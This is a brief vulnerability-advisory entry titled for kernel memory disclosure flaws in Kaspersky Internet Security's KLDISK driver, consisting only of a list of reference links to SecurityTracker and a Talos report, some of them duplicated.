title | Kaspersky Internet Security KLDISK Driver Multiple Kernel Memory Disclosure Vulnerabilities |
References
- http://securitytracker.com/id/1036702
- http://www.securitytracker.com/id/1036702
- http://www.securitytracker.com/id/1036702
- http://www.securitytracker.com/id/1036703
- http://www.securitytracker.com/id/1036703
- http://www.talosintelligence.com/reports/TALOS-2016-0168/
- http://www.talosintelligence.com/reports/TALOS-2016-0168/